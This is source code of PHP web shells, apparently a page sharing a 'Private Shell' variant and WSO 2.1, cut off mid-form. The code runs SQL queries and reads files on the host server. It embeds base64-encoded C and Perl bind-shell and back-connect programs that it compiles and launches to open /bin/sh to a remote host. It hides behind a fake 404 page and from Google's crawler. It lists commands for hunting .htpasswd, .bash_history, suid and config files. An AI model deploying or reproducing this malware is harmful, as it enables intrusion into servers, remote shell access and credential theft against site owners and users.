1243     $tmp = "<input type=text name=sql_base value=''>"; 
1244     if(isset($_POST['sql_host'])){ 
1245         if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { 
1246             switch($_POST['charset']) { 
1247                 case "Windows-1251": $db->setCharset('cp1251'); break; 
1248                 case "UTF-8": $db->setCharset('utf8'); break; 
1249                 case "KOI8-R": $db->setCharset('koi8r'); break; 
1250                 case "KOI8-U": $db->setCharset('koi8u'); break; 
1251                 case "cp866": $db->setCharset('cp866'); break; 
1252             } 
1253             $db->listDbs(); 
1254             echo "<select name=sql_base><option value=''></option>"; 
1255             while($item = $db->fetch()) { 
1256                 list($key, $value) = each($item); 
1257                 echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>'; 
1258             } 
1259             echo '</select>'; 
1260         } 
1261         else echo $tmp; 
1262     }else 
1263         echo $tmp; 
1264     ?></td> 
1265                 <td><input type=submit value=">>"></td> 
1266             </tr> 
1267         </table> 
1268         <script> 
1269             function st(t,l) { 
1270                 document.sf.p1.value = 'select'; 
1271                 document.sf.p2.value = t; 
1272                 if(l!=null)document.sf.p3.value = l; 
1273                 document.sf.submit(); 
1274             } 
1275             function is() { 
1276                 for(i=0;i<document.sf.elements['tbl[]'].length;++i) 
1277                     document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked; 
1278             } 
1279         </script> 
1280     <?php 
1281     if(isset($db) && $db->link){ 
1282         echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; 
1283             if(!empty($_POST['sql_base'])){ 
1284                 $db->selectdb($_POST['sql_base']); 
1285                 echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>"; 
1286                 $tbls_res = $db->listTables(); 
1287                 while($item = $db->fetch($tbls_res)) { 
1288                     list($key, $value) = each($item); 
1289                     $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); 
1290                     $value = htmlspecialchars($value); 
1291                     echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
1292                 } 
1293                 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>"; 
1294                 if(@$_POST['p1'] == 'select') { 
1295                     $_POST['p1'] = 'query'; 
1296                     $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].''); 
1297                     $num = $db->fetch(); 
1298                     $num = $num['n']; 
1299                     echo "<span>".$_POST['p2']."</span> ($num) "; 
1300                     for($i=0;$i<($num/30);$i++) 
1301                         if($i != (int)$_POST['p3']) 
1302                             echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> "; 
1303                         else 
1304                             echo ($i+1)," "; 
1305                     if($_POST['type']=='pgsql') 
1306                         $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); 
1307                     else 
1308                         $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; 
1309                     echo "<br><br>"; 
1310                 } 
1311                 if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) { 
1312                     $db->query(@$_POST['p3']); 
1313                     if($db->res !== false) { 
1314                         $title = false; 
1315                         echo '<table width=100% cellspacing=0 cellpadding=2 class=main>'; 
1316                         $line = 1; 
1317                         while($item = $db->fetch())    { 
1318                             if(!$title)    { 
1319                                 echo '<tr>'; 
1320                                 foreach($item as $key => $value) 
1321                                     echo '<th>'.$key.'</th>'; 
1322                                 reset($item); 
1323                                 $title=true; 
1324                                 echo '</tr><tr>'; 
1325                                 $line = 2; 
1326                             } 
1327                             echo '<tr class="l'.$line.'">'; 
1328                             $line = $line==1?2:1; 
1329                             foreach($item as $key => $value) { 
1330                                 if($value == null) 
1331                                     echo '<td><i>null</i></td>'; 
1332                                 else 
1333                                     echo '<td>'.nl2br(htmlspecialchars($value)).'</td>'; 
1334                             } 
1335                             echo '</tr>'; 
1336                         } 
1337                         echo '</table>'; 
1338                     } else { 
1339                         echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>'; 
1340                     } 
1341                 } 
1342                 echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>"; 
1343                 echo "</td></tr>"; 
1344             } 
1345             echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; 
1346             if(@$_POST['p1'] == 'loadfile') { 
1347                 $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file"); 
1348                 $file = $db->fetch(); 
1349                 echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1350             } 
1351     } 
1352     echo '</div>'; 
1353     printFooter(); 
1354 } 
1355 function actionNetwork() { 
1356     printHeader(); 
1357     $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; 
1358     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; 
1359     $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; 
1360     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; 
1361     ?> 
1362     <h1>Network tools</h1><div class=content> 
1363     <form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;"> 
1364     <span>Bind port to /bin/sh</span><br/> 
1365     Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value=">>"> 
1366     </form> 
1367     <form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;"> 
1368     <span>Back-connect to</span><br/> 
1369     Server: <input type='text' name='server' value='<?=$_SERVER['REMOTE_ADDR']?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>"> 
1370     </form><br> 
1371     <?php 
1372     if(isset($_POST['p1'])) { 
1373         function cf($f,$t) { 
1374             $w=@fopen($f,"w") or @function_exists('file_put_contents'); 
1375             if($w)    { 
1376                 @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); 
1377                 @fclose($w); 
1378             } 
1379         } 
1380         if($_POST['p1'] == 'bpc') { 
1381             cf("/tmp/bp.c",$bind_port_c); 
1382             $out = ex("gcc -o /tmp/bp /tmp/bp.c"); 
1383             @unlink("/tmp/bp.c"); 
1384             $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &"); 
1385             echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>"; 
1386         } 
1387         if($_POST['p1'] == 'bpp') { 
1388             cf("/tmp/bp.pl",$bind_port_p); 
1389             $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &"); 
1390             echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>"; 
1391         } 
1392         if($_POST['p1'] == 'bcc') { 
1393             cf("/tmp/bc.c",$back_connect_c); 
1394             $out = ex("gcc -o /tmp/bc /tmp/bc.c"); 
1395             @unlink("/tmp/bc.c"); 
1396             $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &"); 
1397             echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>"; 
1398         } 
1399         if($_POST['p1'] == 'bcp') { 
1400             cf("/tmp/bc.pl",$back_connect_p); 
1401             $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &"); 
1402             echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>"; 
1403         } 
1404     } 
1405     echo '</div>'; 
1406     printFooter(); 
1407 } 
1408 if( empty($_POST['a']) ) 
1409     if(isset($default_action) && function_exists('action' . $default_action)) 
1410         $_POST['a'] = $default_action; 
1411     else 
1412         $_POST['a'] = 'SecInfo'; 
1413 if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) 
1414     call_user_func('action' . $_POST['a']); 
1415 ?> 
1416 <a href="http://www.devilscafe.in" target="_blank"><img src="http://images.cooltext.com/1380134.gif" /></a><div id="cot_tl_fixed"><marquee>Private Shell - (c)oded by Lagipre-dz ~ (e)dited by Minhal Mehdi</marquee></div> 
1417 www.devilscafe.in </marquee></div>

Here’s another version of the same shell script: WSO 2.1 (by pgems.in this time)

   1 <?php 
   2 /* WSO 2.1 (Web Shell by pgems.in) */ 
   3 /*Subhashdasyam.com*/
   4 $auth_pass = "36028fcd4abb97e9e4f47d929ddc9980"; 
   5 $color = "#00ff00"; 
   6 $default_action = 'FilesMan'; 
   7 @define('SELF_PATH', __FILE__); 
   8 if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { 
   9     header('HTTP/1.0 404 Not Found'); 
  10     exit; 
  11 } 
  12 @session_start(); 
  13 @error_reporting(0); 
  14 @ini_set('error_log',NULL); 
  15 @ini_set('log_errors',0); 
  16 @ini_set('max_execution_time',0); 
  17 @set_time_limit(0); 
  18 @set_magic_quotes_runtime(0); 
  19 @define('VERSION', '2.1'); 
  20 if( get_magic_quotes_gpc() ) { 
  21     function stripslashes_array($array) { 
  22         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); 
  23     } 
  24     $_POST = stripslashes_array($_POST); 
  25 } 
  26 function printLogin() { 
  27     ?> 
  28 <h1>Not Found</h1> 
  29 <p>The requested URL was not found on this server.</p> 
  30 <hr> 
  31 <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address> 
  32     <style> 
  33         input { margin:0;background-color:#fff;border:1px solid #fff; } 
  34     </style> 
  35     <center> 
  36     <form method=post> 
  37     <input type=password name=pass> 
  38     </form></center> 
  39     <?php 
  40     exit; 
  41 } 
  42 if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] )) 
  43     if( empty( $auth_pass ) || 
  44         ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) ) 
  45         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; 
  46     else 
  47         printLogin(); 
  48 
  49 if( strtolower( substr(PHP_OS,0,3) ) == "win" ) 
  50     $os = 'win'; 
  51 else 
  52     $os = 'nix'; 
  53 $safe_mode = @ini_get('safe_mode'); 
  54 $disable_functions = @ini_get('disable_functions'); 
  55 $home_cwd = @getcwd(); 
  56 if( isset( $_POST['c'] ) ) 
  57     @chdir($_POST['c']); 
  58 $cwd = @getcwd(); 
  59 if( $os == 'win') { 
  60     $home_cwd = str_replace("\\", "/", $home_cwd); 
  61     $cwd = str_replace("\\", "/", $cwd); 
  62 } 
  63 if( $cwd[strlen($cwd)-1] != '/' ) 
  64     $cwd .= '/'; 
  65      
  66 if($os == 'win') 
  67     $aliases = array( 
  68         "List Directory" => "dir", 
  69         "Find index.php in current dir" => "dir /s /w /b index.php", 
  70         "Find *config*.php in current dir" => "dir /s /w /b *config*.php", 
  71         "Show active connections" => "netstat -an", 
  72         "Show running services" => "net start", 
  73         "User accounts" => "net user", 
  74         "Show computers" => "net view", 
  75         "ARP Table" => "arp -a", 
  76         "IP Configuration" => "ipconfig /all" 
  77     ); 
  78 else 
  79     $aliases = array( 
  80           "List dir" => "ls -la", 
  81         "list file attributes on a Linux second extended file system" => "lsattr -va", 
  82           "show opened ports" => "netstat -an | grep -i listen", 
  83         "Find" => "", 
  84           "find all suid files" => "find / -type f -perm -04000 -ls", 
  85           "find suid files in current dir" => "find . -type f -perm -04000 -ls",
  86           "find all sgid files" => "find / -type f -perm -02000 -ls", 
  87           "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
  88           "find config.inc.php files" => "find / -type f -name config.inc.php", 
  89           "find config* files" => "find / -type f -name \"config*\"", 
  90           "find config* files in current dir" => "find . -type f -name \"config*\"", 
  91           "find all writable folders and files" => "find / -perm -2 -ls", 
  92           "find all writable folders and files in current dir" => "find . -perm -2 -ls", 
  93           "find all service.pwd files" => "find / -type f -name service.pwd", 
  94           "find service.pwd files in current dir" => "find . -type f -name service.pwd", 
  95           "find all .htpasswd files" => "find / -type f -name .htpasswd", 
  96           "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", 
  97           "find all .bash_history files" => "find / -type f -name .bash_history", 
  98           "find .bash_history files in current dir" => "find . -type f -name .bash_history", 
  99           "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", 
 100           "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", 
 101         "Locate" => "", 
 102           "locate httpd.conf files" => "locate httpd.conf", 
 103         "locate vhosts.conf files" => "locate vhosts.conf", 
 104         "locate proftpd.conf files" => "locate proftpd.conf", 
 105         "locate psybnc.conf files" => "locate psybnc.conf", 
 106         "locate my.conf files" => "locate my.conf", 
 107         "locate admin.php files" =>"locate admin.php", 
 108         "locate cfg.php files" => "locate cfg.php", 
 109         "locate conf.php files" => "locate conf.php", 
 110         "locate config.dat files" => "locate config.dat", 
 111         "locate config.php files" => "locate config.php", 
 112         "locate config.inc files" => "locate config.inc", 
 113         "locate config.inc.php" => "locate config.inc.php", 
 114         "locate config.default.php files" => "locate config.default.php", 
 115         "locate config* files " => "locate config", 
 116         "locate .conf files"=>"locate '.conf'", 
 117         "locate .pwd files" => "locate '.pwd'", 
 118         "locate .sql files" => "locate '.sql'", 
 119         "locate .htpasswd files" => "locate '.htpasswd'", 
 120         "locate .bash_history files" => "locate '.bash_history'", 
 121         "locate .mysql_history files" => "locate '.mysql_history'", 
 122         "locate .fetchmailrc files" => "locate '.fetchmailrc'", 
 123         "locate backup files" => "locate backup", 
 124         "locate dump files" => "locate dump", 
 125         "locate priv files" => "locate priv"     
 126     ); 
 127 
 128 function printHeader() { 
 129     if(empty($_POST['charset'])) 
 130         $_POST['charset'] = "UTF-8"; 
 131     global $color; 
 132     ?> 
 133 <html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?>- 404 Not Found Shell V.<?=VERSION?>-SubhashDasyam.com</title> 
 134 <style> 
 135     body {background-color:#000;color:#fff;} 
 136     body,td,th    { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; } 
 137     span,h1,a    { color:<?=$color?> !important; } 
 138     span        { font-weight: bolder; } 
 139     h1            { border:1px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;margin:0px; } 
 140     div.content    { padding: 5px;margin-left:5px;} 
 141     a            { text-decoration:none; } 
 142     a:hover        { background:#ff0000; } 
 143     .ml1        { border:1px solid #444;padding:5px;margin:0;overflow: auto; } 
 144     .bigarea    { width:100%;height:250px; } 
 145     input, textarea, select    { margin:0;color:#00ff00;background-color:#000;border:1px solid <?=$color?>; font: 9pt Monospace,"Courier New"; } 
 146     form        { margin:0px; } 
 147     #toolsTbl    { text-align:center; } 
 148     .toolsInp    { width: 80%; } 
 149     .main th    {text-align:left;} 
 150     .main tr:hover{background-color:#5e5e5e;} 
 151     .main td, th{vertical-align:middle;} 
 152     pre            {font-family:Courier,Monospace;} 
 153     #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);} 
 154 </style> 
 155 <script> 
 156     function set(a,c,p1,p2,p3,charset) { 
 157         if(a != null)document.mf.a.value=a; 
 158         if(c != null)document.mf.c.value=c; 
 159         if(p1 != null)document.mf.p1.value=p1; 
 160         if(p2 != null)document.mf.p2.value=p2; 
 161         if(p3 != null)document.mf.p3.value=p3; 
 162         if(charset != null)document.mf.charset.value=charset; 
 163     } 
 164     function g(a,c,p1,p2,p3,charset) { 
 165         set(a,c,p1,p2,p3,charset); 
 166         document.mf.submit(); 
 167     } 
 168     function a(a,c,p1,p2,p3,charset) { 
 169         set(a,c,p1,p2,p3,charset); 
 170         var params = "ajax=true"; 
 171         for(i=0;i<document.mf.elements.length;i++) 
 172             params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value); 
 173         sr('<?=$_SERVER['REQUEST_URI'];?>', params); 
 174     } 
 175     function sr(url, params) {     
 176         if (window.XMLHttpRequest) { 
 177             req = new XMLHttpRequest(); 
 178             req.onreadystatechange = processReqChange; 
 179             req.open("POST", url, true); 
 180             req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); 
 181             req.send(params); 
 182         }  
 183         else if (window.ActiveXObject) { 
 184             req = new ActiveXObject("Microsoft.XMLHTTP"); 
 185             if (req) { 
 186                 req.onreadystatechange = processReqChange; 
 187                 req.open("POST", url, true); 
 188                 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); 
 189                 req.send(params); 
 190             } 
 191         } 
 192     } 
 193     function processReqChange() { 
 194         if( (req.readyState == 4) ) 
 195             if(req.status == 200) { 
 196                 //alert(req.responseText); 
 197                 var reg = new RegExp("(\\d+)([\\S\\s]*)", "m"); 
 198                 var arr=reg.exec(req.responseText); 
 199                 eval(arr[2].substr(0, arr[1])); 
 200             }  
 201             else alert("Request error!"); 
 202     } 
 203 </script> 
 204 <head><body><div style="position:absolute;width:100%;top:0;left:0;"> 
 205 <form method=post name=mf style='display:none;'> 
 206 <input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'> 
 207 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'> 
 208 <input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'> 
 209 <input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'> 
 210 <input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'> 
 211 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> 
 212 </form> 
 213 <?php 
 214     $freeSpace = @diskfreespace($GLOBALS['cwd']); 
 215     $totalSpace = @disk_total_space($GLOBALS['cwd']); 
 216     $totalSpace = $totalSpace?$totalSpace:1; 
 217     $release = @php_uname('r'); 
 218     $kernel = @php_uname('s'); 
 219     $millink='http://milw0rm.com/search.php?dong='; 
 220     if( strpos('Linux', $kernel) !== false ) 
 221         $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) ); 
 222     else 
 223         $millink .= urlencode( $kernel . ' ' . substr($release,0,3) ); 
 224     if(!function_exists('posix_getegid')) { 
 225         $user = @get_current_user(); 
 226         $uid = @getmyuid(); 
 227         $gid = @getmygid(); 
 228         $group = "?"; 
 229     } else { 
 230         $uid = @posix_getpwuid(@posix_geteuid()); 
 231         $gid = @posix_getgrgid(@posix_getegid()); 
 232         $user = $uid['name']; 
 233         $uid = $uid['uid']; 
 234         $group = $gid['name']; 
 235         $gid = $gid['gid']; 
 236     } 
 237     $cwd_links = ''; 
 238     $path = explode("/", $GLOBALS['cwd']); 
 239     $n=count($path); 
 240     for($i=0;$i<$n-1;$i++) { 
 241         $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; 
 242         for($j=0;$j<=$i;$j++) 
 243             $cwd_links .= $path[$j].'/'; 
 244         $cwd_links .= "\")'>".$path[$i]."/</a>"; 
 245     } 
 246     $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); 
 247     $opt_charsets = ''; 
 248     foreach($charsets as $item) 
 249         $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>'; 
 250     $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); 
 251     if(!empty($GLOBALS['auth_pass'])) 
 252     $m['Logout'] = 'Logout'; 
 253     $m['Self remove'] = 'SelfRemove'; 
 254     $menu = ''; 
 255     foreach($m as $k => $v) 
 256         $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>'; 
 257     $drives = ""; 
 258     if ($GLOBALS['os'] == 'win') { 
 259         foreach( range('a','z') as $drive ) 
 260         if (is_dir($drive.':\\')) 
 261             $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; 
 262     } 
 263     echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname<br>User<br>Php<br>Hdd<br>Cwd'.($GLOBALS['os'] == 'win'?'<br>Drives':'').'</span></td>'. 
 264          '<td>:<nobr>'.substr(@php_uname(), 0, 120).'  <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[milw0rm]</a></nobr><br>:'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>:'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=<?=$color?><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>:'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>:'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>:'.$drives.'</td>'. 
 265          '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'. 
 266          '<table cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">'; 
 267 } 
 268 
 269 function printFooter() { 
 270     $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>"; 
 271 ?> 
 272 </div> 
 273 <table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%"> 
 274     <tr> 
 275         <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td> 
 276         <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td> 
 277     </tr> 
 278     <tr> 
 279         <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td> 
 280         <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td> 
 281     </tr> 
 282     <tr> 
 283         <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td> 
 284         <td><form method='post' ENCTYPE='multipart/form-data'> 
 285         <input type=hidden name=a value='FilesMAn'> 
 286         <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'> 
 287         <input type=hidden name=p1 value='uploadFile'> 
